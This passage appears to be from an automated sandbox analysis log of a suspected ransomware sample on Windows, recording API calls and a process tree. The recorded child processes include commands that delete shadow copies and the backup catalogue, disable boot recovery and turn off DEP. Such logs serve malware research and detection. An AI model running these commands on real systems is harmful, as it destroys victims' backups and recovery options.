(_Block=0x266ce0) [0059.598] free (_Block=0x26ca90) [0059.598] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4a8482c [0059.598] free (_Block=0x266ea0) [0059.598] free (_Block=0x26c810) [0059.598] free (_Block=0x26c830) [0059.598] free (_Block=0x267f80) [0059.598] free (_Block=0x2663e0) [0059.598] free (_Block=0x266430) [0059.598] free (_Block=0x26c7f0) [0059.599] free (_Block=0x266500) [0059.599] free (_Block=0x266cc0) [0059.599] free (_Block=0x268040) [0059.599] free (_Block=0x2668a0) [0059.599] free (_Block=0x268000) [0059.599] free (_Block=0x266840) [0059.599] free (_Block=0x266860) [0059.599] free (_Block=0x266720) [0059.599] free (_Block=0x266740) [0059.599] free (_Block=0x2666c0) [0059.599] free (_Block=0x2666e0) [0059.599] free (_Block=0x266780) [0059.599] free (_Block=0x2667a0) [0059.599] free (_Block=0x2667e0) [0059.599] free (_Block=0x266800) [0059.599] free (_Block=0x266600) [0059.599] free (_Block=0x266620) [0059.599] free (_Block=0x2665a0) [0059.599] free (_Block=0x2665c0) [0059.599] free (_Block=0x266660) [0059.599] free (_Block=0x266680) [0059.599] free (_Block=0x266540) [0059.599] free (_Block=0x266560) [0059.599] free (_Block=0x2664b0) [0059.599] free (_Block=0x266480) [0059.599] free (_Block=0x266d70) [0059.599] WbemLocator:IUnknown:Release (This=0x1d11390) returned 0x2 [0059.599] WbemLocator:IUnknown:Release (This=0x1d23b28) returned 0x0 [0059.604] WbemLocator:IUnknown:Release (This=0x1d23a98) returned 0x0 [0059.606] WbemLocator:IUnknown:Release (This=0x1d11390) returned 0x1 [0059.606] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4a8482c [0059.606] WbemLocator:IUnknown:Release (This=0x1d11390) returned 0x0 [0059.606] free (_Block=0x26c6f0) [0059.606] free (_Block=0x26c710) [0059.606] free (_Block=0x268540) [0059.606] free (_Block=0x26c730) [0059.606] free (_Block=0x26c750) [0059.606] free (_Block=0x268580) [0059.607] free (_Block=0x26c570) [0059.607] free (_Block=0x26c590) [0059.607] free (_Block=0x2683c0) [0059.607] free (_Block=0x26c5b0) [0059.607] free (_Block=0x26c5d0) [0059.607] free (_Block=0x268400) [0059.607] free (_Block=0x26c4f0) [0059.607] free (_Block=0x26c510) [0059.607] free (_Block=0x268340) [0059.607] free (_Block=0x26c530) [0059.607] free (_Block=0x26c550) [0059.607] free (_Block=0x268380) [0059.607] free (_Block=0x26c670) [0059.607] free (_Block=0x26c690) [0059.607] free (_Block=0x2684c0) [0059.607] free (_Block=0x26c6b0) [0059.607] free (_Block=0x26c6d0) [0059.607] free (_Block=0x268500) [0059.607] free (_Block=0x26c470) [0059.607] free (_Block=0x26c490) [0059.607] free (_Block=0x2682c0) [0059.607] free (_Block=0x26c4b0) [0059.607] free (_Block=0x26c4d0) [0059.607] free (_Block=0x268300) [0059.607] free (_Block=0x26c5f0) [0059.607] free (_Block=0x26c610) [0059.607] free (_Block=0x268440) [0059.607] free (_Block=0x26c630) [0059.608] free (_Block=0x26c650) [0059.608] free (_Block=0x268480) [0059.608] free (_Block=0x26c3b0) [0059.608] free (_Block=0x26c3d0) [0059.608] free (_Block=0x268200) [0059.608] free (_Block=0x26c270) [0059.608] free (_Block=0x26c290) [0059.608] free (_Block=0x2680c0) [0059.608] free (_Block=0x266d30) [0059.608] free (_Block=0x266d50) [0059.608] free (_Block=0x268080) [0059.608] free (_Block=0x26c2f0) [0059.608] free (_Block=0x26c310) [0059.608] free (_Block=0x268140) [0059.608] free (_Block=0x26c3f0) [0059.608] free (_Block=0x26c410) [0059.608] free (_Block=0x268240) [0059.608] free (_Block=0x26c2b0) [0059.608] free (_Block=0x26c2d0) [0059.608] free (_Block=0x268100) [0059.608] free (_Block=0x26c330) [0059.608] free (_Block=0x26c350) [0059.608] free (_Block=0x268180) [0059.608] free (_Block=0x26c370) [0059.608] free (_Block=0x26c390) [0059.608] free (_Block=0x2681c0) [0059.608] free (_Block=0x26c430) [0059.608] free (_Block=0x26c450) [0059.608] free (_Block=0x268280) [0059.609] CoUninitialize () [0060.761] exit (_Code=-2147217406) [0060.761] free (_Block=0x2685c0) [0060.761] free (_Block=0x267c10) [0060.761] ??1CHString@@QEAA@XZ () returned 0x7fef4a8482c [0060.761] free (_Block=0x266e20) [0060.762] free (_Block=0x266520) [0060.762] free (_Block=0x267bd0) [0060.762] free (_Block=0x267b90) [0060.762] free (_Block=0x267b40) [0060.762] free (_Block=0x267b00) [0060.762] free (_Block=0x267aa0) [0060.762] free (_Block=0x265a90) [0060.762] free (_Block=0x265a50) [0060.762] ??1CHString@@QEAA@XZ () returned 0x7fef4a8482c [0060.762] free (_Block=0x26c850) Thread: id = 37 os_tid = 0x780 Thread: id = 53 os_tid = 0x93c Thread: id = 54 os_tid = 0x98c Thread: id = 55 os_tid = 0x99c Thread: id = 56 os_tid = 0x9ac Process: id = "11" image_name = "wbadmin.exe" filename = "c:\\windows\\system32\\wbadmin.exe" page_root = "0x32633000" os_pid = "0x244" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x54c" cmd_line = "wbadmin delete catalog -quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 31 os_tid = 0x7c8 Thread: id = 36 os_tid = 0x6f4 Thread: id = 38 os_tid = 0x798 Thread: id = 41 os_tid = 0x7ac Thread: id = 44 os_tid = 0x82c Thread: id = 45 os_tid = 0x83c Process: id = "12" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x33e74000" os_pid = "0x174" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x43c" cmd_line = "bcdedit.exe /set {current} nx AlwaysOff" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 32 os_tid = 0x15c Process: id = "13" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x3318c000" os_pid = "0x5dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x840" cmd_line = "bcdedit /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 33 os_tid = 0x7bc Process: id = "14" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x31d58000" os_pid = "0x7a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x568" cmd_line = "vssadmin.exe delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 34 os_tid = 0x540 Thread: id = 35 os_tid = 0x40c Thread: id = 39 os_tid = 0x364 Thread: id = 40 os_tid = 0x7b8 Thread: id = 42 os_tid = 0x80c Thread: id = 43 os_tid = 0x81c Process: id = "15" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x31c28000" os_pid = "0x84c" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "14" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:00057890" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 46 os_tid = 0x8dc Thread: id = 47 os_tid = 0x89c Thread: id = 48 os_tid = 0x88c [0050.175] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xccd8c0 | out: lpSystemTimeAsFileTime=0xccd8c0*(dwLowDateTime=0x27e08110, dwHighDateTime=0x1d5f247)) [0050.175] GetCurrentProcessId () returned 0x84c [0050.175] GetCurrentThreadId () returned 0x88c [0050.175] GetTickCount () returned 0x114629a [0050.175] QueryPerformanceCounter (in: lpPerformanceCount=0xccd8c8 | out: lpPerformanceCount=0xccd8c8*=17103703300) returned 1 [0050.175] malloc (_Size=0x100) returned 0x468e80 Thread: id = 49 os_tid = 0x87c Thread: id = 50 os_tid = 0x86c Thread: id = 51 os_tid = 0x85c Thread: id = 52 os_tid = 0x90c Thread: id = 57 os_tid = 0x9dc Thread: id = 137 os_tid = 0x870 Thread: id = 164 os_tid = 0xa00 Process: id = "16" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 58 os_tid = 0x484 Thread: id = 59 os_tid = 0x5d8 Thread: id = 60 os_tid = 0x320 Thread: id = 61 os_tid = 0x6cc Thread: id = 62 os_tid = 0x42c Thread: id = 63 os_tid = 0x1e4 Thread: id = 64 os_tid = 0x760 Thread: id = 65 os_tid = 0x75c Thread: id = 66 os_tid = 0x74c Thread: id = 67 os_tid = 0x710 Thread: id = 68 os_tid = 0x6e8 Thread: id = 69 os_tid = 0x6e0 Thread: id = 70 os_tid = 0x6d0 Thread: id = 71 os_tid = 0x6bc Thread: id = 72 os_tid = 0x6b8 Thread: id = 73 os_tid = 0x6b0 Thread: id = 74 os_tid = 0x6a8 Thread: id = 75 os_tid = 0x69c Thread: id = 76 os_tid = 0x698 Thread: id = 77 os_tid = 0x688 Thread: id = 78 os_tid = 0x684 Thread: id = 79 os_tid = 0x678 Thread: id = 80 os_tid = 0x4a8 Thread: id = 81 os_tid = 0x46c Thread: id = 82 os_tid = 0x44c Thread: id = 83 os_tid = 0x424 Thread: id = 84 os_tid = 0x420 Thread: id = 85 os_tid = 0x41c Thread: id = 86 os_tid = 0x404 Thread: id = 87 os_tid = 0x14c Thread: id = 88 os_tid = 0x158 Thread: id = 89 os_tid = 0x3fc Thread: id = 90 os_tid = 0x3f4 Thread: id = 91 os_tid = 0x3e8 Thread: id = 92 os_tid = 0x39c Thread: id = 93 os_tid = 0x390 Thread: id = 94 os_tid = 0x38c Thread: id = 95 os_tid = 0x388 Thread: id = 96 os_tid = 0x37c Thread: id = 97 os_tid = 0x374 Thread: id = 128 os_tid = 0xacc Thread: id = 129 os_tid = 0xadc Thread: id = 130 os_tid = 0x344 Thread: id = 139 os_tid = 0x900 Thread: id = 140 os_tid = 0x8c0 Thread: id = 141 os_tid = 0x8b0 Thread: id = 142 os_tid = 0x890 Thread: id = 143 os_tid = 0x8d0 Thread: id = 144 os_tid = 0x8f0 Thread: id = 145 os_tid = 0x930 Thread: id = 146 os_tid = 0x9b0 Thread: id = 149 os_tid = 0x9a0 Thread: id = 150 os_tid = 0x990 Process: id = "17" image_name = "wbengine.exe" filename = "c:\\windows\\system32\\wbengine.exe" page_root = "0x3222f000" os_pid = "0x8ac" os_integrity_level = "0x4000" os_privileges = "0x20860100" monitor_reason = "rpc_server" parent_id = "11" os_parent_pid = "0x1d8" cmd_line = "\"C:\\Windows\\system32\\wbengine.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\wbengine" [0xe], "NT AUTHORITY\\Logon Session 00000000:00057a39" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 98 os_tid = 0x94c Thread: id = 99 os_tid = 0x92c Thread: id = 100 os_tid = 0x91c Thread: id = 101 os_tid = 0x8fc Thread: id = 102 os_tid = 0x8ec Thread: id = 103 os_tid = 0x8cc Thread: id = 104 os_tid = 0x8bc Thread: id = 160 os_tid = 0x4fc Thread: id = 177 os_tid = 0x8b0 Process: id = "18" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x32035000" os_pid = "0x95c" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "15" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:00058088" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 105 os_tid = 0x9fc Thread: id = 106 os_tid = 0x9ec Thread: id = 107 os_tid = 0x9cc Thread: id = 108 os_tid = 0x9bc Thread: id = 109 os_tid = 0x97c Thread: id = 110 os_tid = 0x96c Thread: id = 138 os_tid = 0xa98 Thread: id = 163 os_tid = 0x9f0 Process: id = "19" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x6016c000" os_pid = "0xa9c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "16" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0003feb1" [0xc000000f] Thread: id = 111 os_tid = 0xac8 Thread: id = 112 os_tid = 0xabc Thread: id = 113 os_tid = 0xab8 Thread: id = 114 os_tid = 0xab4 Thread: id = 115 os_tid = 0xab0 Thread: id = 116 os_tid = 0xaac Thread: id = 117 os_tid = 0xaa8 Thread: id = 118 os_tid = 0xaa4 Thread: id = 119 os_tid = 0xaa0 Thread: id = 147 os_tid = 0x634 Thread: id = 162 os_tid = 0x9e0 Thread: id = 174 os_tid = 0x20c Process: id = "20" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x62367000" os_pid = "0xa74" os_integrity_level = "0x4000" os_privileges = "0xe60b1e990" monitor_reason = "rpc_server" parent_id = "16" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 120 os_tid = 0xa94 Thread: id = 121 os_tid = 0xa90 Thread: id = 122 os_tid = 0xa8c Thread: id = 123 os_tid = 0xa88 Thread: id = 124 os_tid = 0xa84 Thread: id = 125 os_tid = 0xa80 Thread: id = 126 os_tid = 0xa7c Thread: id = 127 os_tid = 0xa78 Thread: id = 148 os_tid = 0x5ac Thread: id = 176 os_tid = 0xa58 Process: id = "21" image_name = "vdsldr.exe" filename = "c:\\windows\\system32\\vdsldr.exe" page_root = "0x3288f000" os_pid = "0xa0c" os_integrity_level = "0x4000" os_privileges = "0x20860100" monitor_reason = "rpc_server" parent_id = "17" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\System32\\vdsldr.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\wbengine" [0xe], "NT AUTHORITY\\Logon Session 00000000:00057a39" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 131 os_tid = 0x640 Thread: id = 132 os_tid = 0x4e4 Thread: id = 133 os_tid = 0x600 Thread: id = 134 os_tid = 0xa44 Thread: id = 135 os_tid = 0xa40 Thread: id = 136 os_tid = 0xa1c Process: id = "22" image_name = "vds.exe" filename = "c:\\windows\\system32\\vds.exe" page_root = "0x2fb3b000" os_pid = "0xa70" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "21" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\vds.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\vds" [0xe], "NT AUTHORITY\\Logon Session 00000000:00058c82" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 151 os_tid = 0x850 Thread: id = 152 os_tid = 0x830 Thread: id = 153 os_tid = 0xa30 Thread: id = 154 os_tid = 0x910 Thread: id = 155 os_tid = 0x950 Thread: id = 156 os_tid = 0x3b4 Thread: id = 157 os_tid = 0x880 Thread: id = 158 os_tid = 0x620 Thread: id = 159 os_tid = 0x124 Thread: id = 161 os_tid = 0xa10 Thread: id = 166 os_tid = 0x9c0 Thread: id = 167 os_tid = 0x31c Thread: id = 168 os_tid = 0x318 Thread: id = 169 os_tid = 0xa4c Thread: id = 170 os_tid = 0x490 Thread: id = 171 os_tid = 0xa50 Thread: id = 172 os_tid = 0x5f4 Thread: id = 173 os_tid = 0x5e4 Process: id = "23" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 178 os_tid = 0x8 Thread: id = 179 os_tid = 0x5c Thread: id = 180 os_tid = 0x38 Thread: id = 181 os_tid = 0x44 Thread: id = 182 os_tid = 0x24 Thread: id = 183 os_tid = 0xc4 Thread: id = 184 os_tid = 0xb0 Thread: id = 185 os_tid = 0x9c Thread: id = 186 os_tid = 0x78 Thread: id = 187 os_tid = 0xc0 Thread: id = 188 os_tid = 0x28 Thread: id = 189 os_tid = 0x30 Thread: id = 190 os_tid = 0x4c Thread: id = 191 os_tid = 0x40 Thread: id = 192 os_tid = 0xcc Thread: id = 193 os_tid = 0x34 Thread: id = 194 os_tid = 0xd0 Thread: id = 195 os_tid = 0xd4 Thread: id = 196 os_tid = 0xb8 Thread: id = 197 os_tid = 0xd8 Thread: id = 198 os_tid = 0xdc Thread: id = 199 os_tid = 0xe0 Thread: id = 202 os_tid = 0x64 Thread: id = 203 os_tid = 0x84 Thread: id = 204 os_tid = 0xf4 Thread: id = 206 os_tid = 0x48 Thread: id = 207 os_tid = 0x2c Thread: id = 208 os_tid = 0x100 Thread: id = 209 os_tid = 0x104 Thread: id = 210 os_tid = 0x90 Thread: id = 211 os_tid = 0x108 Thread: id = 212 os_tid = 0x10c Thread: id = 213 os_tid = 0x110 Thread: id = 214 os_tid = 0xb4 Thread: id = 215 os_tid = 0x118 Thread: id = 216 os_tid = 0x11c Thread: id = 220 os_tid = 0x138 Thread: id = 221 os_tid = 0x13c Thread: id = 222 os_tid = 0x140 Thread: id = 223 os_tid = 0x144 Thread: id = 240 os_tid = 0x198 Thread: id = 263 os_tid = 0x50 Thread: id = 264 os_tid = 0x88 Thread: id = 269 os_tid = 0x68 Thread: id = 290 os_tid = 0x98 Thread: id = 292 os_tid = 0x60 Thread: id = 293 os_tid = 0x74 Thread: id = 298 os_tid = 0x278 Thread: id = 326 os_tid = 0x2f0 Thread: id = 335 os_tid = 0x314 Thread: id = 343 os_tid = 0x8c Thread: id = 355 os_tid = 0x80 Thread: id = 381 os_tid = 0x3d4 Thread: id = 418 os_tid = 0xbc Thread: id = 420 os_tid = 0x398 Thread: id = 421 os_tid = 0x39c Thread: id = 462 os_tid = 0x94 Thread: id = 487 os_tid = 0x4fc Thread: id = 513 os_tid = 0x504 Thread: id = 523 os_tid = 0x5ac Thread: id = 555 os_tid = 0x62c Thread: id = 556 os_tid = 0x630 Thread: id = 567 os_tid = 0x65c Thread: id = 591 os_tid = 0x6c4 Thread: id = 598 os_tid = 0x660 Thread: id = 607 os_tid = 0xa0 Thread: id = 612 os_tid = 0x714 Thread: id = 616 os_tid = 0x724 Thread: id = 618 os_tid = 0x72c Thread: id = 619 os_tid = 0x730 Thread: id = 620 os_tid = 0x734 Thread: id = 622 os_tid = 0x738 Thread: id = 624 os_tid = 0x20 Thread: id = 651 os_tid = 0x1c Thread: id = 656 os_tid = 0x7c0 Process: id = "24" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x2cfcb000" os_pid = "0xe4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "23" os_parent_pid = "0x4" cmd_line = "\\SystemRoot\\System32\\smss.exe" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 200 os_tid = 0xe8 Thread: id = 201 os_tid = 0xec Thread: id = 217 os_tid = 0x124 Thread: id = 228 os_tid = 0x168 Process: id = "25" image_name = "autochk.exe" filename = "c:\\windows\\system32\\autochk.exe" page_root = "0x16c16000" os_pid = "0xf8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0xe4" cmd_line = "\\??\\C:\\Windows\\system32\\autochk.exe *" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 205 os_tid = 0xfc Process: id = "26" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x2cd6e000" os_pid = "0x128" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0xe4" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000000 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 218 os_tid = 0x12c Process: id = "27" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x2c7de000" os_pid = "0x130" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "26" os_parent_pid = "0x128" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 219 os_tid = 0x134 Thread: id = 224 os_tid = 0x148 Thread: id = 225 os_tid = 0x14c Thread: id = 226 os_tid = 0x150 Thread: id = 227 os_tid = 0x154 Thread: id = 236 os_tid = 0x18c Thread: id = 241 os_tid = 0x19c Thread: id = 242 os_tid = 0x1a0 Thread: id = 247 os_tid = 0x1bc Thread: id = 256 os_tid = 0x1e4 Process: id = "28" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x3375000" os_pid = "0x158" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0xe4" 